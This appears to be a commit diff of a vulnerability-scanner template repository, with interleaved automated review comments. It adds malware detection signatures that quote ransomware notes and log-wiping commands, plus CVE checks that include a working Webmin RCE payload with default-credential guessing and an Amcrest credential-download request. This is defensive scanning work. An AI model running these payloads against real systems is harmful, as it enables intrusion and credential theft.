{"ID":"CVE-2022-46169","Info":{"Name":"Cacti \u003c=1.2.22 - Remote Command Injection","Severity":"critical","Description":"Cacti through 1.2.22 is susceptible to remote command injection. There is insufficient authorization within the remote agent when handling HTTP requests with a custom Forwarded-For HTTP header. An attacker can send a specially crafted HTTP request to the affected instance and execute arbitrary OS commands on the server, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-46169.yaml"}
{"ID":"CVE-2022-46381","Info":{"Name":"Linear eMerge E3-Series - Cross-Site Scripting","Severity":"medium","Description":"Linear eMerge E3-Series devices contain a cross-site scripting vulnerability via the type parameter, e.g., to the badging/badge_template_v0.php component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site and thus steal cookie-based authentication credentials and launch other attacks. This affects versions 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-46381.yaml"}
{"ID":"CVE-2022-46443","Info":{"Name":"Bangresto - SQL Injection","Severity":"high","Description":"Bangresto 1.0 is vulnberable to SQL Injection via the itemqty%5B%5D parameter.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2022/CVE-2022-46443.yaml"}
{"ID":"CVE-2022-46888","Info":{"Name":"NexusPHP \u003c1.7.33 - Cross-Site Scripting","Severity":"medium","Description":"NexusPHP before 1.7.33 contains multiple cross-site scripting vulnerabilities via the secret parameter in /login.php; q parameter in /user-ban-log.php; query parameter in /log.php; text parameter in /moresmiles.php; q parameter in myhr.php; or id parameter in /viewrequests.php. An attacker can inject arbitrary web script or HTML, which can allow theft of cookie-based authentication credentials and launch of other attacks..\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-46888.yaml"}
{"ID":"CVE-2022-46934","Info":{"Name":"kkFileView 4.1.0 - Cross-Site Scripting","Severity":"medium","Description":"kkFileView 4.1.0 is susceptible to cross-site scripting via the url parameter at /controller/OnlinePreviewController.java. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-46934.yaml"}
{"ID":"CVE-2022-47002","Info":{"Name":"Masa CMS - Authentication Bypass","Severity":"critical","Description":"Masa CMS 7.2, 7.3, and 7.4-beta are susceptible to authentication bypass in the Remember Me function. An attacker can bypass authentication via a crafted web request and thereby obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-47002.yaml"}
@ -1892,6 +1899,7 @@
{"ID":"CVE-2023-25157","Info":{"Name":"GeoServer OGC Filter - SQL Injection","Severity":"critical","Description":"GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. GeoServer includes support for the OGC Filter expression language and the OGC Common Query Language (CQL) as part of the Web Feature Service (WFS) and Web Map Service (WMS) protocols. CQL is also supported through the Web Coverage Service (WCS) protocol for ImageMosaic coverages. Users are advised to upgrade to either version 2.21.4, or version 2.22.2 to resolve this issue. Users unable to upgrade should disable the PostGIS Datastore *encode functions* setting to mitigate ``strEndsWith``, ``strStartsWith`` and ``PropertyIsLike `` misuse and enable the PostGIS DataStore *preparedStatements* setting to mitigate the ``FeatureId`` misuse.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-25157.yaml"}
{"ID":"CVE-2023-25346","Info":{"Name":"ChurchCRM 4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the id parameter of /churchcrm/v2/family/not-found.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-25346.yaml"}
{"ID":"CVE-2023-25717","Info":{"Name":"Ruckus Wireless Admin - Remote Code Execution","Severity":"critical","Description":"Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-25717.yaml"}
{"ID":"CVE-2023-26067","Info":{"Name":"Lexmark Printers - Command Injection","Severity":"high","Description":"Certain Lexmark devices through 2023-02-19 mishandle Input Validation (issue 1 of 4).\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2023/CVE-2023-26067.yaml"}
{"ID":"CVE-2023-26255","Info":{"Name":"STAGIL Navigation for Jira Menu \u0026 Themes \u003c2.0.52 - Local File Inclusion","Severity":"high","Description":"STAGIL Navigation for Jira Menu \u0026 Themes plugin before 2.0.52 is susceptible to local file inclusion via modifying the fileName parameter to the snjCustomDesignConfig endpoint. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can potentially allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-26255.yaml"}
{"ID":"CVE-2023-26256","Info":{"Name":"STAGIL Navigation for Jira Menu \u0026 Themes \u003c2.0.52 - Local File Inclusion","Severity":"high","Description":"STAGIL Navigation for Jira Menu \u0026 Themes plugin before 2.0.52 is susceptible to local file inclusion via modifying the fileName parameter to the snjFooterNavigationConfig endpoint. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can potentially allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-26256.yaml"}
{"ID":"CVE-2023-26360","Info":{"Name":"Unauthenticated File Read Adobe ColdFusion","Severity":"high","Description":"Unauthenticated Arbitrary File Read vulnerability due to deserialization of untrusted data in Adobe ColdFusion. The vulnerability affects ColdFusion 2021 Update 5 and earlier as well as ColdFusion 2018 Update 15 and earlier\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2023/CVE-2023-26360.yaml"}
@ -1972,3 +1980,5 @@
{"ID":"CVE-2023-38646","Info":{"Name":"Metabase \u003c 0.46.6.1 - Remote Code Execution","Severity":"critical","Description":"Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-38646.yaml"}
{"ID":"CVE-2023-39120","Info":{"Name":"Nodogsplash - Directory Traversal","Severity":"high","Description":"Nodogsplash product was affected by a directory traversal vulnerability that also impacted the OpenWrt product. This vulnerability was addressed in Nodogsplash version 5.0.1. Exploiting this vulnerability, remote attackers could read arbitrary files from the target system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-39120.yaml"}
{"ID":"CVE-2023-39143","Info":{"Name":"PaperCut \u003c 22.1.3 - Path Traversal","Severity":"critical","Description":"PaperCut NG and PaperCut MF before 22.1.3 are vulnerable to path traversal which enables attackers to read, delete, and upload arbitrary files.","Classification":{"CVSSScore":"9.4"}},"file_path":"http/cves/2023/CVE-2023-39143.yaml"}
{"ID":"CVE-2023-4174","Info":{"Name":"mooSocial 3.1.6 - Reflected Cross Site Scripting","Severity":"medium","Description":"A vulnerability has been found in mooSocial mooStore 3.1.6 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-4174.yaml"}
{"ID":"CVE-2015-9323","Info":{"Name":"404 to 301 \u003c= 2.0.2 - Authenticated Blind SQL Injection","Severity":"critical","Description":"The 404 to 301 Redirect, Log and Notify 404 Errors WordPress plugin was affected by an Authenticated Blind SQL Injection security vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/CVE-2015-9323.yaml"}


@ -1 +1 @@
a11349fed98e93a8bbebdc46ec6718ae
a9b24e5df67bd3f35194cf16454fc5be


@ -0,0 +1,23 @@
id: basicrat-malware
info:
name: BasicRAT Malware - Detect
author: daffainfo
severity: info
reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/malware/multi/malware_multi_vesche_basicrat.yara
tags: malware,file,basicrat
file:
- extensions:
- all
matchers:
- type: word
part: raw
words:
- "HKCU Run registry key applied"
- "HKCU Run registry key failed"
- "Error, platform unsupported."
- "Persistence successful,"
- "Persistence unsuccessful,"
condition: and


@ -0,0 +1,21 @@
id: cerber-malware
info:
name: Cerber Malware - Detect
author: daffainfo
severity: info
reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/ransomware/windows/ransomware_windows_cerber_evasion.yara
tags: malware,file,cerber
file:
- extensions:
- all
matchers:
- type: word
part: raw
words:
- "38oDr5.vbs"
- "8ivq.dll"
- "jmsctls_progress32"
condition: and


@ -0,0 +1,28 @@
id: crunchrat-malware
info:
name: CrunchRAT Malware - Detect
author: daffainfo
severity: info
reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/malware/windows/malware_windows_t3ntman_crunchrat.yara
tags: malware,file,crunchrat
file:
- extensions:
- all
matchers:
- type: word
part: raw
words:
- "<action>command<action>"
- "<action>upload<action>"
- "<action>download<action>"
- "cmd.exe"
- "application/x-www-form-urlencoded"
- "&action="
- "&secondary="
- "<secondary>"
- "<action>"
condition: and
case-insensitive: true


@ -0,0 +1,23 @@
id: ransomware_windows_hydracrypt
info:
name: Hydracrypt Malware - Detect
author: daffainfo
severity: info
reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/ransomware/windows/ransomware_windows_hydracrypt.yara
tags: malware,file,hydracrypt
file:
- extensions:
- all
matchers:
- type: word
part: raw
words:
- "oTraining"
- "Stop Training"
- "Play \"sound.wav\""
- "&Start Recording"
- "7About record"
condition: and
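Review bot: The `id` on the first line, `ransomware_windows_hydracrypt`, is the upstream YARA rule name rather than the `<family>-malware` form every other template in this batch uses (`basicrat-malware`, `cerber-malware`, `petya-malware-variant-1`, …), and since the id is what users address templates by, the odd one out is easy to miss in id-based filters. `id: hydracrypt-malware` lines it up with the `tags: malware,file,hydracrypt` line below it.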


@ -0,0 +1,38 @@
id: macos-bella-malware
info:
name: Bella Malware - Detect
author: daffainfo
severity: info
reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/malware/macos/malware_macos_bella.yara
tags: malware,file,macos-bella
file:
- extensions:
- all
matchers-condition: or
matchers:
- type: word
part: raw
words:
- "Verified! [2FV Enabled] Account ->"
- "There is no root shell to perform this command. See [rooter] manual entry."
- "Attempt to escalate Bella to root through a variety of attack vectors."
- "BELLA IS NOW RUNNING. CONNECT TO BELLA FROM THE CONTROL CENTER."
condition: or
- type: word
part: raw
words:
- "user_pass_phish"
- "bella_info"
- "get_root"
condition: and
- type: word
part: raw
words:
- "Please specify a bella server."
- "What port should Bella connect on [Default is 4545]:"
condition: and


@ -0,0 +1,24 @@
id: petya-malware-variant-1
info:
name: Petya Malware (Variant 1) - Detect
author: daffainfo
severity: info
reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/ransomware/windows/ransomware_windows_petya_variant_1.yara
tags: malware,file,petya
file:
- extensions:
- all
matchers:
- type: word
part: raw
words:
- "Ooops, your important files are encrypted."
- "Send your Bitcoin wallet ID and personal installation key to e-mail"
- "wowsmith123456@posteo.net. Your personal installation key:"
- "Send $300 worth of Bitcoin to following address:"
- "have been encrypted. Perhaps you are busy looking for a way to recover your"
- "need to do is submit the payment and purchase the decryption key."
condition: or


@ -0,0 +1,20 @@
id: petya-malware-variant-3
info:
name: Petya Malware (Variant 3) - Detect
author: daffainfo
severity: info
reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/ransomware/windows/ransomware_windows_petya_variant_3.yara
tags: malware,file,petya
file:
- extensions:
- all
matchers:
- type: word
part: raw
words:
- "wevtutil cl Setup & wevtutil cl System"
- "fsutil usn deletejournal /D %c:"
condition: or
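Review bot: `condition: or` on the single matcher means either `wevtutil cl Setup & wevtutil cl System` or `fsutil usn deletejournal /D %c:` alone produces a hit, and both are ordinary log-clearing and USN-journal commands that also turn up in legitimate maintenance scripts, so those files will be reported as Petya. If the upstream rule requires both strings, `condition: and` mirrors it; if `or` is deliberate, a comment saying why would stop the next reader from tightening it.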


@ -0,0 +1,18 @@
id: petya-malware-variant-bitcoin
info:
name: Petya Malware (Variant Bitcoin) - Detect
author: daffainfo
severity: info
reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/ransomware/windows/ransomware_windows_petya_variant_bitcoin.yara
tags: malware,file,petya
file:
- extensions:
- all
matchers:
- type: word
part: raw
words:
- "MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcq+YLIBZzQ2ZTK0A2DtX4GRKxEEFLCy7vP12EYOPXknVy/+mf0JFWixz29QiTf5oLu15wVLONCuEibGaNNpgq+CXsPwfITDbDDmdrRIiUEUw6o3pt5pNOskfOJbMan2TZu6zfhzuts7KafP5UA8/0Hmf5K3/F9Mf9SE68EZjK+cIiFlKeWndP0XfRCYXI9AJYCeaOu7CXF6U0AVNnNjvLeOn42LHFUK4o6JwIDAQAB"


@ -0,0 +1,29 @@
id: pony-stealer-malware
info:
name: Windows Pony Stealer Malware - Detect
author: daffainfo
severity: info
reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/malware/windows/malware_windows_pony_stealer.yara
tags: malware,file,pony,stealer
file:
- extensions:
- all
matchers:
- type: word
part: raw
words:
- "signons.sqlite"
- "signons.txt"
- "signons2.txt"
- "signons3.txt"
- "WininetCacheCredentials"
- "moz_logins"
- "encryptedPassword"
- "FlashFXP"
- "BulletProof"
- "CuteFTP"
condition: and
case-insensitive: true


@ -0,0 +1,21 @@
id: powerware-malware
info:
name: PowerWare Malware - Detect
author: daffainfo
severity: info
reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/ransomware/windows/ransomware_windows_powerware_locky.yara
tags: malware,file,powerware
file:
- extensions:
- all
matchers:
- type: word
part: raw
words:
- "ScriptRunner.dll"
- "ScriptRunner.pdb"
- "fixed.ps1"
condition: and


@ -0,0 +1,32 @@
id: wannacry-malware
info:
name: WannaCry Malware - Detect
author: daffainfo
severity: info
reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/ransomware/windows/ransomware_windows_wannacry.yara
tags: malware,file,wannacry
file:
- extensions:
- all
matchers-condition: or
matchers:
- type: word
part: raw
words:
- "msg/m_chinese"
- ".wnry"
- "attrib +h"
condition: and
- type: word
part: raw
words:
- "WNcry@2ol7"
- "iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com"
- "115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn"
- "12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw"
- "13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94"
condition: or


@ -0,0 +1,34 @@
id: zrypt-malware
info:
name: Zcrypt Malware - Detect
author: daffainfo
severity: info
reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/ransomware/windows/ransomware_windows_zcrypt.yara
tags: malware,file,zrypt
file:
- extensions:
- all
matchers-condition: or
matchers:
- type: word
part: raw
words:
- "How to Buy Bitcoins"
- "ALL YOUR PERSONAL FILES ARE ENCRYPTED"
- "Click Here to Show Bitcoin Address"
- "MyEncrypter2.pdb"
condition: or
- type: word
part: raw
words:
- ".p7b"
- ".p7c"
- ".pdd"
- ".pef"
- ".pem"
- "How to decrypt files.html"
condition: and
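Review bot: `id: zrypt-malware` and `tags: malware,file,zrypt` drop a letter from the family name that `name: Zcrypt Malware - Detect` and the referenced `ransomware_windows_zcrypt.yara` use, so searching templates or tags for `zcrypt` will not find this one. `id: zcrypt-malware` and `tags: malware,file,zcrypt` fix both lines; the file name presumably follows the id and should be renamed with it.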


@ -21,26 +21,36 @@ file:
- 'exec'
- 'eval'
- '__import__'
- 'execfile'
- type: regex
name: command-injection
regex:
- 'subprocess.call\(.*shell=True.*\)'
- 'os.system'
- 'os.popen'
- 'os.popen\d?'
- 'subprocess.run'
- 'commands.getoutput'
- type: regex
name: untrusted-source
regex:
- 'pickle.loads'
- 'cPickle.loads'
- 'pickle\.loads'
- 'c?Pickle\.loads?'
- 'marshal\.loads'
- 'pickle\.Unpickler'
- type: regex
name: dangerous-yaml
regex:
- 'yaml.load'
- 'yaml\.load'
- 'yaml\.safe_load'
- type: regex
name: sqli
regex:
- 'cursor.execute'
- 'cursor\.execute'
- 'sqlite3\.execute'
- 'MySQLdb\.execute'
- 'psycopg2\.execute'
- 'cx_Oracle\.execute'
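Review bot: `yaml\.safe_load` in the `dangerous-yaml` matcher flags the call that is the recommended replacement for `yaml.load`, so every safe call site now reports as dangerous and the finding loses its meaning; drop that line (`yaml\.load` does not match `safe_load`, since `safe_` sits between). The four new `sqli` patterns `sqlite3\.execute`, `MySQLdb\.execute`, `psycopg2\.execute` and `cx_Oracle\.execute` look for module-level functions those DB-API modules do not expose — `execute` is a cursor (or connection) method, which `cursor\.execute` already covers — so they can never match; `\.execute\(` is broader but at least reachable. `command-injection` mixes literal-dot and any-char patterns (`os.popen\d?`, `subprocess.run`, `commands.getoutput` next to the escaped `pickle\.loads` and `yaml\.load`); escaping consistently keeps the rules literal. The `matchers:` list these entries belong to starts above the hunk.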


@ -0,0 +1,219 @@
id: url-extension-inspector
info:
name: URL Extension Inspector
author: ayadim
severity: unknown
description: |
This template assists you in discovering intriguing extensions within a list of URLs.
reference:
- https://github.com/CYS4srl/CYS4-SensitiveDiscoverer/
tags: file,urls,extension
file:
- extensions:
- all
extractors:
- type: regex
name: Hot finding
regex:
- "(?i)(htdocs|www|html|web|webapps|public|public_html|uploads|website|api|test|app|backup|bin|bak|old|release|sql)\\.(7z|bz2|gz|lz|rar|tar\\.gz|tar\\.bz2|xz|zip|z)"
- type: regex
name: Backup file
regex:
- "(?i)(\\.bak|\\.backup|\\.bkp|\\._bkp|\\.bk|\\.BAK)"
- type: regex
name: PHP Source
regex:
- "(?i)(\\.php)(\\.~|\\.bk|\\.bak|\\.bkp|\\.BAK|\\.swp|\\.swo|\\.swn|\\.tmp|\\.save|\\.old|\\.new|\\.orig|\\.dist|\\.txt|\\.disabled|\\.original|\\.backup|\\._back|\\._1\\.bak|~|!|\\.0|\\.1|\\.2|\\.3)"
- type: regex
name: ASP Source
regex:
- "(?i)(\\.asp)(\\.~|\\.bk|\\.bak|\\.bkp|\\.BAK|\\.swp|\\.swo|\\.swn|\\.tmp|\\.save|\\.old|\\.new|\\.orig|\\.dist|\\.txt|\\.disabled|\\.original|\\.backup|\\._back|\\._1\\.bak|~|!|\\.0|\\.1|\\.2|\\.3)"
- type: regex
name: Database file
regex:
- "(?i)\\.db|\\.sql"
- type: regex
name: Bash script
regex:
- "(?i)\\.sh|\\.bashrc|\\.zshrc"
- type: regex
name: 1Password password manager database file
regex:
- "(?i)\\.agilekeychain"
- type: regex
name: ASP configuration file
regex:
- "(?i)\\.asa"
- type: regex
name: Apple Keychain database file
regex:
- "(?i)\\.keychain"
- type: regex
name: Azure service configuration schema file
regex:
- "(?i)\\.cscfg"
- type: regex
name: Compressed archive file
regex:
- "(?i)(\\.zip|\\.gz|\\.tar|\\.rar|\\.tgz)"
- type: regex
name: Configuration file
regex:
- "(?i)(\\.ini|\\.config|\\.conf)"
- type: regex
name: Day One journal file
regex:
- "(?i)\\.dayone"
- type: regex
name: Document file
regex:
- "(?i)(\\.doc|\\.docx|\\.rtf)"
- type: regex
name: GnuCash database file
regex:
- "(?i)\\.gnucash"
- type: regex
name: Include file
regex:
- "(?i)\\.inc"
- type: regex
name: XML file
regex:
- "(?i)\\.xml"
- type: regex
name: Old file
regex:
- "(?i)\\.old"
- type: regex
name: Log file
regex:
- "(?i)\\.log"
- type: regex
name: Java file
regex:
- "(?i)\\.java"
- type: regex
name: SQL dump file
regex:
- "(?i)\\.sql"
- type: regex
name: Excel file
regex:
- "(?i)(\\.xls|\\.xlsx|\\.csv)"
- type: regex
name: Certificate file
regex:
- "(?i)(\\.cer|\\.crt|\\.p7b)"
- type: regex
name: Java key storte
regex:
- "(?i)\\.jks"
- type: regex
name: KDE Wallet Manager database file
regex:
- "(?i)\\.kwallet"
- type: regex
name: Little Snitch firewall configuration file
regex:
- "(?i)\\.xpl"
- type: regex
name: Microsoft BitLocker Trusted Platform Module password file
regex:
- "(?i)\\.tpm"
- type: regex
name: Microsoft BitLocker recovery key file
regex:
- "(?i)\\.bek"
- type: regex
name: Microsoft SQL database file
regex:
- "(?i)\\.mdf"
- type: regex
name: Microsoft SQL server compact database file
regex:
- "(?i)\\.sdf"
- type: regex
name: Network traffic capture file
regex:
- "(?i)\\.pcap"
- type: regex
name: OpenVPN client configuration file
regex:
- "(?i)\\.ovpn"
- type: regex
name: PDF file
regex:
- "(?i)\\.pdf"
- type: regex
name: PHP file
regex:
- "(?i)\\.pcap"
- type: regex
name: Password Safe database file
regex:
- "(?i)\\.psafe3"
- type: regex
name: Potential configuration file
regex:
- "(?i)\\.yml"
- type: regex
name: Potential cryptographic key bundle
regex:
- "(?i)(\\.pkcs12|\\.p12|\\.pfx|\\.asc|\\.pem)"
- type: regex
name: Potential private key
regex:
- "(?i)otr.private_key"
- type: regex
name: Presentation file
regex:
- "(?i)(\\.ppt|\\.pptx)"
- type: regex
name: Python file
regex:
- "(?i)\\.py"
- type: regex
name: Remote Desktop connection file
regex:
- "(?i)\\.rdp"
- type: regex
name: Ruby On Rails file
regex:
- "(?i)\\.rb"
- type: regex
name: SQLite database file
regex:
- "(?i)\\.sqlite|\\.sqlitedb"
- type: regex
name: SQLite3 database file
regex:
- "(?i)\\.sqlite3"
- type: regex
name: Sequel Pro MySQL database manager bookmark file
regex:
- "(?i)\\.plist"
- type: regex
name: Shell configuration file
regex:
- "(?i)(\\.exports|\\.functions|\\.extra)"
- type: regex
name: Temporary file
regex:
- "(?i)\\.tmp"
- type: regex
name: Terraform variable config file
regex:
- "(?i)\\.tfvars"
- type: regex
name: Text file
regex:
- "(?i)\\.txt"
- type: regex
name: Tunnelblick VPN configuration file
regex:
- "(?i)\\.tblk"
- type: regex
name: Windows BitLocker full volume encrypted data file
regex:
- "(?i)\\.fve"
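Review bot: The `PHP file` extractor near the end carries `\\.pcap` instead of `\\.php`, so it duplicates `Network traffic capture file` and a PHP URL is never reported under that name; change its regex line to `- "(?i)\\.php"`. None of the patterns is anchored at the end, so `\\.py` also fires on `.python`, `\\.sh` on `.shtml` and `\\.inc` on `.include`; a trailing `\\b` (or `(?:$|[?#/])` for URL lists) on each pattern would keep the matches to the intended extension. `Database file` (`\\.db|\\.sql`) and `SQL dump file` (`\\.sql`) both report `.sql`, which doubles every such hit. `Java key storte` in the JKS extractor name is a typo for `Java key store`.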


@ -1 +1 @@
6.1.8
6.2.0


@ -1 +1 @@
7.76
7.77


@ -1 +1 @@
3.3.0
3.4.0


@ -1 +1 @@
3.0.4
3.1.2


@ -1 +1 @@
6.5.2
6.5.3


@ -1 +1 @@
1.2.6.6
1.2.6.7


@ -1 +1 @@
1.13.7
1.14.0


@ -1 +1 @@
3.15.1
3.15.2


@ -1 +1 @@
3.0.30
3.0.31


@ -1 +1 @@
2.5.1
2.5.2


@ -1 +1 @@
1.106.0
1.107.0


@ -1 +1 @@
16.3.0
16.4.0


@ -1 +1 @@
5.6.3
5.6.5


@ -1 +1 @@
3.1.9
3.1.11


@ -1 +1 @@
10.1.30
10.2.1


@ -1 +1 @@
2.25.20
2.25.22


@ -1 +1 @@
5.5.1
5.6


@ -1 +1 @@
4.22.2
4.24.0


@ -1 +1 @@
4.4.1.3
4.5


@ -1 +1 @@
3.2.5
3.2.7


@ -1 +1 @@
5.7.4
5.7.5


@ -1 +1 @@
3.33.0
3.36.0


@ -1 +1 @@
9.4.1
9.4.2


@ -1 +1 @@
3.4.4
3.4.5


@ -1 +1 @@
2.5.9
2.5.9.1


@ -1 +1 @@
2.0.9
2.1


@ -1 +1 @@
4.10.3
4.10.4


@ -1 +1 @@
7.0.7
7.0.8


@ -1 +1 @@
4.4.4
4.4.5


@ -1 +1 @@
3.1.5
3.1.6


@ -1 +1 @@
1.0.120
1.0.121.1


@ -1 +1 @@
2.25.0
2.25.2


@ -1 +1 @@
3.5.1.17
3.5.1.19


@ -1 +1 @@
1.52.0
1.53.0


@ -1 +1 @@
2.1.5
2.1.7


@ -1 +1 @@
1.7.7
1.7.9


@ -1 +1 @@
6.1.3
6.2.0


@ -1 +1 @@
5.9.0
5.9.2


@ -1 +1 @@
2.5.8
2.5.9


@ -1 +1 @@
1.23.7
1.23.9


@ -1 +1 @@
4.63.3
4.64


@ -1 +1 @@
2.4.0
2.4.1


@ -1 +1 @@
7.4.2
7.5.0


@ -1 +1 @@
6.2.2
6.3.1


@ -1 +1 @@
2.3.1
2.3.2


@ -1 +1 @@
7.9.0
8.0.2


@ -1 +1 @@
20.12
20.13


@ -1 +1 @@
9.0.20
9.0.23


@ -1 +1 @@
3.2.16
3.2.18


@ -1 +1 @@
14.1.4
14.1.5


@ -1 +1 @@
4.12.0
4.13.0


@ -1 +1 @@
1.4.3
1.4.4


@ -1 +1 @@
1.8.2.3
1.8.3.1


@ -0,0 +1,45 @@
id: CVE-2017-8229
info:
name: Amcrest IP Camera Web Management - Data Exposure
author: pussycat0x
severity: critical
description: |
Amcrest IPM-721S V2.420.AC00.16.R.20160909 devices allow an unauthenticated attacker to download the administrative credentials.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2017-8229
- http://packetstormsecurity.com/files/153224/Amcrest-IPM-721S-Credential-Disclosure-Privilege-Escalation.html
- https://github.com/ethanhunnt/IoT_vulnerabilities/blob/master/Amcrest_sec_issues.pdf
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cwe-id: CWE-255
metadata:
max-request: 1
fofa-query: "Amcrest"
shodan-query: html:"Amcrest"
verified: true
tags: cve,cve2017,amcrest,iot
http:
- method: GET
path:
- "{{BaseURL}}/current_config/Sha1Account1"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DevInformation"
- "SerialID"
condition: and
- type: word
part: header
words:
- "application/octet-stream"
- type: status
status:
- 200
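Review bot: The `classification` block lists `cvss-metrics`, `cvss-score` and `cwe-id` but no `cve-id`, while the other new CVE templates in this commit (CVE-2021-22707, CVE-2021-24409, CVE-2022-24384) carry one; add `cve-id: CVE-2017-8229` so the identifier lives in the classification metadata and not only in the template id. With it present the block matches the layout of CVE-2022-24384 at the end of this commit, which lists cve-id alongside cvss-metrics, cvss-score and cwe-id.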


@ -0,0 +1,69 @@
id: CVE-2019-15642
info:
name: Webmin < 1.920 - Authenticated Remote Code Execution
author: pussycat0x
severity: high
description: |
rpc.cgi in Webmin through 1.920 allows authenticated Remote Code Execution via a crafted object name because unserialise_variable makes an eval call. NOTE: the Webmin_Servers_Index documentation states "RPC can be used to run any command or modify any file on a server, which is why access to it must not be granted to un-trusted Webmin users."
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2019-15642
- https://github.com/jas502n/CVE-2019-15642
metadata:
max-request: 4
shodan-query: title:"Webmin"
verified: true
tags: cve,cve2019,webmin,rce
variables:
cmd: '`id`'
http:
- raw:
- |
POST /session_login.cgi HTTP/1.1
Host: {{Hostname}}
Cookie: redirect=1; testing=1
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Referer: {{RootURL}}
Accept-Encoding: gzip, deflate
user={{username}}&pass={{password}}
- |
POST /rpc.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: {{RootURL}}/sysinfo.cgi?xnavigation=1
Accept-Encoding: gzip, deflate
OBJECT Socket;print "Content-Type: text/plain\n\n";$cmd={{cmd}};print "$cmd\n\n";
attack: pitchfork
payloads:
username:
- admin
- root
password:
- admin
- root
stop-at-first-match: true
host-redirects: true
cookie-reuse: true
matchers-condition: and
matchers:
- type: regex
part: body_2
regex:
- 'uid=(\d+)\(.*?\) gid=(\d+)\(.*?\) groups=(\d+)\(.*?\)'
- type: word
part: body_2
words:
- "Content-type: text/plain"
- type: status
status:
- 200
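Review bot: `name: Webmin < 1.920` and the description's `Webmin through 1.920` disagree on whether 1.920 itself is affected; "through" is inclusive and the description reads as the NVD wording, so the name is the one to change, `name: Webmin <= 1.920 - Authenticated Remote Code Execution`. There is no `classification` block at all, unlike the sibling templates in this commit; at least `cve-id: CVE-2019-15642` belongs there. The `payloads` lists hard-code two username/password guesses rather than taking `{{username}}`/`{{password}}` from the user, which makes this a default-credential probe against `session_login.cgi` before it is an RCE check; the description should say so, and `max-request: 4` (2 pairs x 2 requests) is consistent with that behaviour.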


@ -0,0 +1,55 @@
id: CVE-2020-28185
info:
name: TerraMaster TOS < 4.2.06 - User Enumeration
author: pussycat0x
severity: medium
description: |
User Enumeration vulnerability in TerraMaster TOS <= 4.2.06 allows remote unauthenticated attackers to identify valid users within the system via the username parameter to wizard/initialise.php.
reference:
- https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/TerraMaster%20TOS%20%E7%94%A8%E6%88%B7%E6%9E%9A%E4%B8%BE%E6%BC%8F%E6%B4%9E%20CVE-2020-28185.md
- https://nvd.nist.gov/vuln/detail/CVE-2020-28185
